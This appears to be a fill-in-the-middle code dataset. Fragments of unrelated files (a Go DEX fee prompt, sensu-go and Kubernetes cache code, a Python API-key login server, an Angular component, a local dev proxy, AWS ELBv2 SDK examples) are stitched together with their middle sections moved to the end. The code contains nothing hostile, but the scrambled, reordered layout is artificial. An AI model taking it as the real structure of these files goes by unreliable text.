if err != nil {
pm.SetError(err.Error())
pm.SetLoading(false)
return
}
pm.Dismiss()
}()
return false
})
md.ParentWindow().ShowModal(appPasswordModal)
}
func confirmRegisterModalDesc(dex *core.Exchange, selectedFeeAsset string) string {
feeAsset := dex.RegFees[selectedFeeAsset]
feeAmt := formatAmount(feeAsset.ID, selectedFeeAsset, feeAsset.Amt)
txt := fmt.Sprintf("Enter your app password to confirm DEX registration. When you submit this form, %s will be spent from your wallet to pay registration fees.", feeAmt)
markets := make([]string, 0, len(dex.Markets))
for _, mkt := range dex.Markets {
lotSize := formatAmount(mkt.BaseID, mkt.BaseSymbol, mkt.LotSize)
markets = append(markets, fmt.Sprintf("Base: %s\tQuote: %s\tLot Size: %s", strings.ToUpper(mkt.BaseSymbol), strings.ToUpper(mkt.QuoteSymbol), lotSize))
}
return fmt.Sprintf("%s\n\nThis DEX supports the following markets. All trades are in multiples of each market's lot size.\n\n%s", txt, strings.Join(markets, "\n"))
}
func formatAmount(assetID uint32, assetName string, amount uint64) string | {
assetInfo, err := asset.Info(assetID)
if err != nil {
return fmt.Sprintf("%d [%s units]", amount, assetName)
}
unitInfo := assetInfo.UnitInfo
convertedLotSize := float64(amount) / float64(unitInfo.Conventional.ConversionFactor)
return fmt.Sprintf("%s %s", strconv.FormatFloat(convertedLotSize, 'f', -1, 64), unitInfo.Conventional.Unit)
} |
|
cache_test.go | package cache
import (
"context"
"reflect"
"testing"
"github.com/sensu/sensu-go/backend/store/etcd"
"github.com/sensu/sensu-go/types"
"github.com/coreos/etcd/integration"
corev2 "github.com/sensu/sensu-go/api/core/v2"
"github.com/sensu/sensu-go/backend/store"
"github.com/sensu/sensu-go/testing/fixture"
"github.com/sensu/sensu-go/types/dynamic"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
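// fixtureEntity returns a fixture entity placed in the given namespace.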
func fixtureEntity(namespace, name string) *corev2.Entity {
entity := corev2.FixtureEntity(name)
entity.Namespace = namespace
return entity
}
func TestCacheGet(t *testing.T) {
cache := Resource{
cache: buildCache([]corev2.Resource{
fixtureEntity("a", "1"),
fixtureEntity("a", "2"),
fixtureEntity("a", "3"),
fixtureEntity("a", "4"),
fixtureEntity("a", "5"),
fixtureEntity("a", "6"),
fixtureEntity("b", "1"),
fixtureEntity("b", "2"),
fixtureEntity("b", "3"),
fixtureEntity("b", "4"),
fixtureEntity("b", "5"),
fixtureEntity("b", "6"),
fixtureEntity("c", "1"),
fixtureEntity("c", "2"),
fixtureEntity("c", "3"),
fixtureEntity("c", "4"),
fixtureEntity("c", "5"),
fixtureEntity("c", "6"),
},
true,
),
}
want := []Value{
{Resource: fixtureEntity("b", "1"), Synth: dynamic.Synthesize(fixtureEntity("b", "1"))},
{Resource: fixtureEntity("b", "2"), Synth: dynamic.Synthesize(fixtureEntity("b", "2"))},
{Resource: fixtureEntity("b", "3"), Synth: dynamic.Synthesize(fixtureEntity("b", "3"))},
{Resource: fixtureEntity("b", "4"), Synth: dynamic.Synthesize(fixtureEntity("b", "4"))},
{Resource: fixtureEntity("b", "5"), Synth: dynamic.Synthesize(fixtureEntity("b", "5"))},
{Resource: fixtureEntity("b", "6"), Synth: dynamic.Synthesize(fixtureEntity("b", "6"))},
}
got := cache.Get("b")
if !reflect.DeepEqual(got, want) {
t.Fatalf("bad resources: got %v, want %v", got, want)
}
}
func TestBuildCache(t *testing.T) {
resource1 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource1", Namespace: "default"}}
resource2 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource2", Namespace: "default"}}
resource3 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource3", Namespace: "acme"}}
cache := buildCache([]corev2.Resource{resource1, resource2, resource3}, false)
assert.Len(t, cache["acme"], 1)
assert.Len(t, cache["default"], 2)
assert.Len(t, cache, 2)
}
func TestResourceUpdateCache(t *testing.T) {
cacher := Resource{
cache: make(map[string][]Value),
}
resource0 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource0", Namespace: "default"}, Foo: "bar"}
resource1 := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource1", Namespace: "default"}, Foo: "bar"}
resource0Bis := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource0", Namespace: "default"}, Foo: "baz"}
resource1Bis := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "resource1", Namespace: "default"}, Foo: "qux"}
// Add a resource
cacher.updates = append(cacher.updates, store.WatchEventResource{
Resource: resource1,
Action: store.WatchCreate,
})
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 1)
// Add a second resource. It should be alphabetically sorted and therefore at
// the beginning of the namespace cache values even if it was appended at the
// end
cacher.updates = append(cacher.updates, store.WatchEventResource{
Resource: resource0, Action: store.WatchCreate,
})
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 2)
assert.Equal(t, resource0, cacher.cache["default"][0].Resource)
assert.Equal(t, resource1, cacher.cache["default"][1].Resource)
// Update the resources
updates := []store.WatchEventResource{
store.WatchEventResource{Resource: resource0Bis, Action: store.WatchUpdate},
store.WatchEventResource{Resource: resource1Bis, Action: store.WatchUpdate},
}
cacher.updates = append(cacher.updates, updates...)
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 2)
assert.Equal(t, resource0Bis, cacher.cache["default"][0].Resource.(*fixture.Resource))
assert.Equal(t, resource1Bis, cacher.cache["default"][1].Resource.(*fixture.Resource))
// Delete the resources
deletes := []store.WatchEventResource{
store.WatchEventResource{Resource: resource1Bis, Action: store.WatchDelete},
store.WatchEventResource{Resource: resource0Bis, Action: store.WatchDelete},
}
cacher.updates = append(cacher.updates, deletes...)
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 0)
// Invalid watch event
var nilResource *fixture.Resource
cacher.updates = append(cacher.updates, store.WatchEventResource{
Resource: nilResource,
Action: store.WatchCreate,
})
cacher.updateCache(context.Background())
assert.Len(t, cacher.cache["default"], 0)
}
func TestResourceRebuild(t *testing.T) {
c := integration.NewClusterV3(t, &integration.ClusterConfig{Size: 1})
defer c.Terminate(t)
client := c.RandClient()
s := etcd.NewStore(client, "store")
require.NoError(t, s.CreateNamespace(context.Background(), types.FixtureNamespace("default")))
ctx := store.NamespaceContext(context.Background(), "default")
cacher := Resource{
cache: make(map[string][]Value),
client: client,
resourceT: &fixture.Resource{},
}
// Empty store
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError, | cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 0)
// Resource added to a new namespace
foo := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "foo", Namespace: "default"}}
if err := s.CreateOrUpdateResource(ctx, foo); err != nil {
t.Fatal(err)
}
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError,
})
cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 1)
// Resource added to an existing namespace
bar := &fixture.Resource{ObjectMeta: corev2.ObjectMeta{Name: "bar", Namespace: "default"}}
if err := s.CreateOrUpdateResource(ctx, bar); err != nil {
t.Fatal(err)
}
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError,
})
cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 2)
// Resource updated
bar.Foo = "acme"
if err := s.CreateOrUpdateResource(ctx, bar); err != nil {
t.Fatal(err)
}
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError,
})
cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 2)
// Resource deleted
if err := s.DeleteResource(ctx, bar.StorePrefix(), bar.GetObjectMeta().Name); err != nil {
t.Fatal(err)
}
cacher.updates = append(cacher.updates, store.WatchEventResource{
Action: store.WatchError,
})
cacher.updateCache(ctx)
assert.Len(t, cacher.cache["default"], 1)
} | }) |
gw2_authserver.py | # (c) 2019-2020 Mikhail Paulyshka
# SPDX-License-Identifier: MIT
import os.path
import aiohttp
import common.mglx_webserver
from .gw2_constants import GW2AuthorizationResult
class Gw2AuthServer(common.mglx_webserver.MglxWebserver):
def __init__(self, gw2api = None):
super(Gw2AuthServer, self).__init__()
self.__gw2api = gw2api
self.add_route('GET', '/', self.handle_login_get)
self.add_route('GET', '/login', self.handle_login_get)
self.add_route('GET', '/login_baddata', self.handle_login_baddata_get)
self.add_route('GET', '/login_failed', self.handle_login_baddata_get)
self.add_route('GET', '/login_noaccount', self.handle_login_noaccount_get)
self.add_route('GET', '/finished', self.handle_finished_get)
self.add_route('POST', '/', self.handle_login_post)
self.add_route('POST', '/login', self.handle_login_post)
#
# Handlers
#
async def handle_login_get(self, request):
return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login.html'))
async def handle_login_baddata_get(self, request):
return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login_baddata.html'))
async def handle_login_failed_get(self, request):
return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login_failed.html'))
async def handle_login_noaccount_get(self, request):
return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login_noaccount.html'))
async def handle_finished_get(self, request):
return aiohttp.web.FileResponse(os.path.join(os.path.dirname(os.path.realpath(__file__)),'html/login_noaccount.html'))
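# Validates the submitted API key against the GW2 API and redirects according
# to the authorization result.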
async def | (self, request):
data = await request.post()
#check for apikey field
if 'apikey' not in data:
raise aiohttp.web.HTTPFound('/login_baddata')
#process authentication
auth_result = None
try:
auth_result = await self.__gw2api.do_auth_apikey(data['apikey'])
except Exception:
self._logger.exception("exception on doing auth:")
raise aiohttp.web.HTTPFound('/login_baddata')
if auth_result == GW2AuthorizationResult.FINISHED:
raise aiohttp.web.HTTPFound('/finished')
elif auth_result == GW2AuthorizationResult.FAILED_NO_ACCOUNT:
raise aiohttp.web.HTTPFound('/login_noaccount')
elif auth_result == GW2AuthorizationResult.FAILED_BAD_DATA:
raise aiohttp.web.HTTPFound('/login_baddata')
else:
raise aiohttp.web.HTTPFound('/login_failed')
raise aiohttp.web.HTTPFound('/login_failed')
| handle_login_post |
login-button.component.ts | import { Component, OnInit } from '@angular/core';
@Component({
selector: 'cvc-login-button',
templateUrl: './login-button.component.html',
styleUrls: ['./login-button.component.less']
})
export class | implements OnInit {
authVisible: boolean;
constructor() {
this.authVisible = false;
}
ngOnInit(): void {
}
showAuth(): void {
this.authVisible = true;
}
handleCancel(): void {
this.authVisible = false;
}
}
| CvcLoginButtonComponent |
resource_access.go | /*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package resourcequota
import (
"fmt"
"time"
"github.com/hashicorp/golang-lru"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/apiserver/pkg/storage/etcd"
"k8s.io/client-go/kubernetes"
corev1listers "k8s.io/client-go/listers/core/v1"
)
// QuotaAccessor abstracts the get/set logic from the rest of the Evaluator. This could be a test stub, a straight passthrough,
// or most commonly a series of deconflicting caches.
type QuotaAccessor interface {
// UpdateQuotaStatus is called to persist final status. This method should write to persistent storage.
// An error indicates that write didn't complete successfully.
UpdateQuotaStatus(newQuota *corev1.ResourceQuota) error
// GetQuotas gets all possible quotas for a given namespace
GetQuotas(namespace string) ([]corev1.ResourceQuota, error)
}
type quotaAccessor struct {
client kubernetes.Interface
// lister can list/get quota objects from a shared informer's cache
lister corev1listers.ResourceQuotaLister
// liveLookups holds the last few live lookups we've done to help amortize cost on repeated lookup failures.
// This lets us handle the case of latent caches, by looking up actual results for a namespace on cache miss/no results.
// We track the lookup result here so that for repeated requests, we don't look it up very often.
liveLookupCache *lru.Cache
liveTTL time.Duration
// updatedQuotas holds a cache of quotas that we've updated. This is used to pull the "really latest" during back to
// back quota evaluations that touch the same quota doc. This only works because we can compare etcd resourceVersions
// for the same resource as integers. Before this change: 22 updates with 12 conflicts. After this change: 15 updates with 0 conflicts.
updatedQuotas *lru.Cache
}
// newQuotaAccessor creates an object that conforms to the QuotaAccessor interface to be used to retrieve quota objects.
func newQuotaAccessor() (*quotaAccessor, error) {
liveLookupCache, err := lru.New(100)
if err != nil {
return nil, err
}
updatedCache, err := lru.New(100)
if err != nil {
return nil, err
}
// client and lister will be set when SetInternalKubeClientSet and SetInternalKubeInformerFactory are invoked
return &quotaAccessor{
liveLookupCache: liveLookupCache,
liveTTL: time.Duration(30 * time.Second),
updatedQuotas: updatedCache,
}, nil
}
func (e *quotaAccessor) UpdateQuotaStatus(newQuota *corev1.ResourceQuota) error {
updatedQuota, err := e.client.CoreV1().ResourceQuotas(newQuota.Namespace).UpdateStatus(newQuota)
if err != nil {
return err
}
key := newQuota.Namespace + "/" + newQuota.Name
e.updatedQuotas.Add(key, updatedQuota)
return nil
}
var etcdVersioner = etcd.APIObjectVersioner{}
// checkCache compares the passed quota against the value in the look-aside cache and returns the newer
// if the cache is out of date, it deletes the stale entry. This only works because of etcd resourceVersions
// being monotonically increasing integers
func (e *quotaAccessor) checkCache(quota *corev1.ResourceQuota) *corev1.ResourceQuota {
key := quota.Namespace + "/" + quota.Name
uncastCachedQuota, ok := e.updatedQuotas.Get(key)
if !ok {
return quota
}
cachedQuota := uncastCachedQuota.(*corev1.ResourceQuota) | }
return cachedQuota
}
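// GetQuotas returns the quotas that apply to the namespace, preferring the
// informer-backed lister and falling back to a TTL-bounded live lookup when
// the lister returns nothing.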
func (e *quotaAccessor) GetQuotas(namespace string) ([]corev1.ResourceQuota, error) {
// determine if there are any quotas in this namespace
// if there are no quotas, we don't need to do anything
items, err := e.lister.ResourceQuotas(namespace).List(labels.Everything())
if err != nil {
return nil, fmt.Errorf("error resolving quota: %v", err)
}
// if there are no items held in our indexer, check our live-lookup LRU, if that misses, do the live lookup to prime it.
if len(items) == 0 {
lruItemObj, ok := e.liveLookupCache.Get(namespace)
if !ok || lruItemObj.(liveLookupEntry).expiry.Before(time.Now()) {
// TODO: If there are multiple operations at the same time and cache has just expired,
// this may cause multiple List operations being issued at the same time.
// If there is already in-flight List() for a given namespace, we should wait until
// it is finished and cache is updated instead of doing the same, also to avoid
// throttling - see #22422 for details.
liveList, err := e.client.Core().ResourceQuotas(namespace).List(metav1.ListOptions{})
if err != nil {
return nil, err
}
newEntry := liveLookupEntry{expiry: time.Now().Add(e.liveTTL)}
for i := range liveList.Items {
newEntry.items = append(newEntry.items, &liveList.Items[i])
}
e.liveLookupCache.Add(namespace, newEntry)
lruItemObj = newEntry
}
lruEntry := lruItemObj.(liveLookupEntry)
for i := range lruEntry.items {
items = append(items, lruEntry.items[i])
}
}
resourceQuotas := []corev1.ResourceQuota{}
for i := range items {
quota := items[i]
quota = e.checkCache(quota)
// always make a copy. We're going to muck around with this and we should never mutate the originals
resourceQuotas = append(resourceQuotas, *quota)
}
return resourceQuotas, nil
} |
if etcdVersioner.CompareResourceVersion(quota, cachedQuota) >= 0 {
e.updatedQuotas.Remove(key)
return quota |
index.ts | // inspired by https://github.com/song940/kelp-static/blob/express/index.js
// this proxy assumes you have codap, building-models and cloud-file-manager all checked out in sibling folders to sage-modeler-site
// the proxy exists to load CODAP, Sage and CFM all with the same domain so cross-iframe communication works as it does in production
// were the same proxy is accomplished using CloudFront behaviors.
import * as http from "http";
import * as https from "https";
import * as fs from "fs";
import * as path from "path";
import * as url from "url";
import * as mime from "mime2";
import * as httpProxy from "http-proxy";
const config = {
port: 10000,
endpoints: {
codap: path.normalize(`${__dirname}/../../../codap/dist/travis/`),
sage: path.normalize(`${__dirname}/../../../building-models/dev/`),
cfm: path.normalize(`${__dirname}/../../../cloud-file-manager/dist/`),
}
};
// used to proxy requests to webpack-devserver
const proxy = httpProxy.createProxyServer(); |
// looks up a file within an endpoint
const findFile = (req: http.IncomingMessage, res: http.ServerResponse, endpoint: string, callback: (code: number, err?: string) => void) => {
const pathname = url.parse(req.url || "").pathname || "";
let filename = path.join(endpoint, pathname);
if (filename.indexOf(endpoint) !== 0) {
return callback(404, `File not found: ${filename}`);
}
if (filename.endsWith("/") || filename.endsWith("\\")) {
filename += "index.html";
}
serveFile(req, res, filename, callback);
};
// serves the file or a directory listing
const serveFile = (req: http.IncomingMessage, res: http.ServerResponse, filename: string, callback: (code: number, err?: string) => void) => {
fs.stat(filename, (err, stat) => {
if (err) {
return callback(404, err.toString());
}
if (stat.isDirectory()) {
return serveDirectory(filename, filename, res);
}
const mtime = new Date(stat.mtimeMs).toUTCString();
if (req.headers["if-modified-since"] === mtime) {
res.writeHead(304);
return res.end();
}
const type = mime.lookup(filename);
const charset = /^text\/|^application\/(javascript|json)/.test(type) ? "UTF-8" : false;
res.setHeader("Last-Modified", mtime);
res.setHeader("Content-Length", stat.size);
res.setHeader("Content-Type", type + (charset ? "; charset=" + charset : ""));
fs.createReadStream(filename).pipe(res);
});
};
// serves a directory listing
const serveDirectory = (cwd: string, dir: string, res: http.ServerResponse) => {
let content = `<h1>Index of ${dir.replace(cwd, "")}</h1><hr />`;
fs.readdir(dir, (err, files) => {
content += "<table width=\"50%\">";
content += "<tr>";
content += "<td><a href=\"..\">../</a></td>";
content += "</tr>";
files.map((filename) => {
const stat = fs.statSync(path.join(dir, filename));
filename = filename + (stat.isDirectory() ? "/" : "");
content += "<tr>";
content += `<td><a href="${filename}">${filename}</a></td>`;
content += `<td>${(stat.mtime || "-")}</td>`;
content += `<td>${(stat.size)}</td>`;
content += "</tr>";
}).join("");
content += "</table></hr>";
res.setHeader("Content-Type", "text/html");
res.end(content);
});
};
// main server
const options: https.ServerOptions = {
key: fs.readFileSync(`${__dirname}/devproxy.key`),
cert: fs.readFileSync(`${__dirname}/devproxy.crt`)
};
const server = https.createServer(options, (req, res) => {
const done = (code: number, err?: string) => {
if (code !== 200) {
res.statusCode = code;
res.write(err || "Unknown error");
res.end();
}
};
const reqUrl = req.url || "";
console.log(new Date(), reqUrl);
const pathname = url.parse(reqUrl).pathname || "";
// codap does not build the index.html file in travis/dist so a local copy is used
if (pathname === "/codap/static/dg/en/cert/index.html") {
const filename = path.normalize(`${__dirname}/codap-index.html`);
serveFile(req, res, filename, done);
} else {
// look to see if the path starts with one of our endpoint folders
const match = reqUrl.match(endpointRegex);
const endpoint = match ? config.endpoints[match[1]] : undefined;
if (endpoint) {
req.url = reqUrl.replace(endpointRegex, "/");
findFile(req, res, endpoint, done);
} else {
// proxy to webpack-devserver
proxy.web(req, res, { target: "https://localhost:10001", secure: false }, (err) => {
res.statusCode = 500;
res.write(err.toString());
res.end();
});
}
}
});
console.log(`Listening on port ${config.port}`);
server.listen(config.port); |
const endpoints = Object.keys(config.endpoints);
const regexString = `^/(${endpoints.join("|")})`;
const endpointRegex = new RegExp(regexString); |
iterator_test.go | package iterator
import (
"fmt"
"testing"
)
func TestIterator(t *testing.T) | {
// exercise an iterator that supports snapshots
vector := NewVector()
iter := NewIterator(vector)
for i := 0; i < 20; i++ {
vector.Add(i)
}
iter.Init()
vector.Remove(0)
vector.Remove(11)
vector.Add(100)
for iter.hasNext() {
fmt.Printf("%v\t", iter.currentItem())
}
fmt.Println()
fmt.Println("========================================")
iter.Init()
for iter.hasNext() {
fmt.Printf("%v\t", iter.currentItem())
}
fmt.Println()
}
|
|
examples_test.go | // Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT.
package elbv2_test
import (
"fmt"
"strings"
"time"
"github.com/Beeketing/aws-sdk-go/aws"
"github.com/Beeketing/aws-sdk-go/aws/awserr"
"github.com/Beeketing/aws-sdk-go/aws/session"
"github.com/Beeketing/aws-sdk-go/service/elbv2"
)
var _ time.Duration
var _ strings.Reader
var _ aws.Config
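// parseTime parses value with the given layout, panicking on failure; the
// examples use it to build fixed timestamps.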
func parseTime(layout, value string) *time.Time {
t, err := time.Parse(layout, value)
if err != nil {
panic(err)
}
return &t
}
// To add tags to a load balancer
//
// This example adds the specified tags to the specified load balancer.
func ExampleELBV2_AddTags_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.AddTagsInput{
ResourceArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
},
Tags: []*elbv2.Tag{
{
Key: aws.String("project"),
Value: aws.String("lima"),
},
{
Key: aws.String("department"),
Value: aws.String("digital-media"),
},
},
}
result, err := svc.AddTags(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateTagKeysException:
fmt.Println(elbv2.ErrCodeDuplicateTagKeysException, aerr.Error())
case elbv2.ErrCodeTooManyTagsException:
fmt.Println(elbv2.ErrCodeTooManyTagsException, aerr.Error())
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create an HTTP listener
//
// This example creates an HTTP listener for the specified load balancer that forwards
// requests to the specified target group.
func ExampleELBV2_CreateListener_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.CreateListenerInput{
DefaultActions: []*elbv2.Action{
{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Type: aws.String("forward"),
},
},
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
Port: aws.Int64(80),
Protocol: aws.String("HTTP"),
}
result, err := svc.CreateListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateListenerException:
fmt.Println(elbv2.ErrCodeDuplicateListenerException, aerr.Error())
case elbv2.ErrCodeTooManyListenersException:
fmt.Println(elbv2.ErrCodeTooManyListenersException, aerr.Error())
case elbv2.ErrCodeTooManyCertificatesException:
fmt.Println(elbv2.ErrCodeTooManyCertificatesException, aerr.Error())
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
case elbv2.ErrCodeCertificateNotFoundException:
fmt.Println(elbv2.ErrCodeCertificateNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create an HTTPS listener
//
// This example creates an HTTPS listener for the specified load balancer that forwards
// requests to the specified target group. Note that you must specify an SSL certificate
// for an HTTPS listener. You can create and manage certificates using AWS Certificate
// Manager (ACM). Alternatively, you can create a certificate using SSL/TLS tools, get
// the certificate signed by a certificate authority (CA), and upload the certificate
// to AWS Identity and Access Management (IAM).
func ExampleELBV2_CreateListener_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.CreateListenerInput{
Certificates: []*elbv2.Certificate{
{
CertificateArn: aws.String("arn:aws:iam::123456789012:server-certificate/my-server-cert"),
},
},
DefaultActions: []*elbv2.Action{
{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Type: aws.String("forward"),
},
},
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
Port: aws.Int64(443),
Protocol: aws.String("HTTPS"),
SslPolicy: aws.String("ELBSecurityPolicy-2015-05"),
}
result, err := svc.CreateListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateListenerException:
fmt.Println(elbv2.ErrCodeDuplicateListenerException, aerr.Error())
case elbv2.ErrCodeTooManyListenersException:
fmt.Println(elbv2.ErrCodeTooManyListenersException, aerr.Error())
case elbv2.ErrCodeTooManyCertificatesException:
fmt.Println(elbv2.ErrCodeTooManyCertificatesException, aerr.Error())
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
case elbv2.ErrCodeCertificateNotFoundException:
fmt.Println(elbv2.ErrCodeCertificateNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create an Internet-facing load balancer
//
// This example creates an Internet-facing load balancer and enables the Availability
// Zones for the specified subnets.
func ExampleELBV2_CreateLoadBalancer_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.CreateLoadBalancerInput{
Name: aws.String("my-load-balancer"),
Subnets: []*string{
aws.String("subnet-b7d581c0"),
aws.String("subnet-8360a9e7"),
},
}
result, err := svc.CreateLoadBalancer(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateLoadBalancerNameException:
fmt.Println(elbv2.ErrCodeDuplicateLoadBalancerNameException, aerr.Error())
case elbv2.ErrCodeTooManyLoadBalancersException:
fmt.Println(elbv2.ErrCodeTooManyLoadBalancersException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeSubnetNotFoundException:
fmt.Println(elbv2.ErrCodeSubnetNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidSubnetException:
fmt.Println(elbv2.ErrCodeInvalidSubnetException, aerr.Error())
case elbv2.ErrCodeInvalidSecurityGroupException:
fmt.Println(elbv2.ErrCodeInvalidSecurityGroupException, aerr.Error())
case elbv2.ErrCodeInvalidSchemeException:
fmt.Println(elbv2.ErrCodeInvalidSchemeException, aerr.Error())
case elbv2.ErrCodeTooManyTagsException:
fmt.Println(elbv2.ErrCodeTooManyTagsException, aerr.Error())
case elbv2.ErrCodeDuplicateTagKeysException:
fmt.Println(elbv2.ErrCodeDuplicateTagKeysException, aerr.Error())
case elbv2.ErrCodeResourceInUseException:
fmt.Println(elbv2.ErrCodeResourceInUseException, aerr.Error())
case elbv2.ErrCodeAllocationIdNotFoundException:
fmt.Println(elbv2.ErrCodeAllocationIdNotFoundException, aerr.Error())
case elbv2.ErrCodeAvailabilityZoneNotSupportedException:
fmt.Println(elbv2.ErrCodeAvailabilityZoneNotSupportedException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
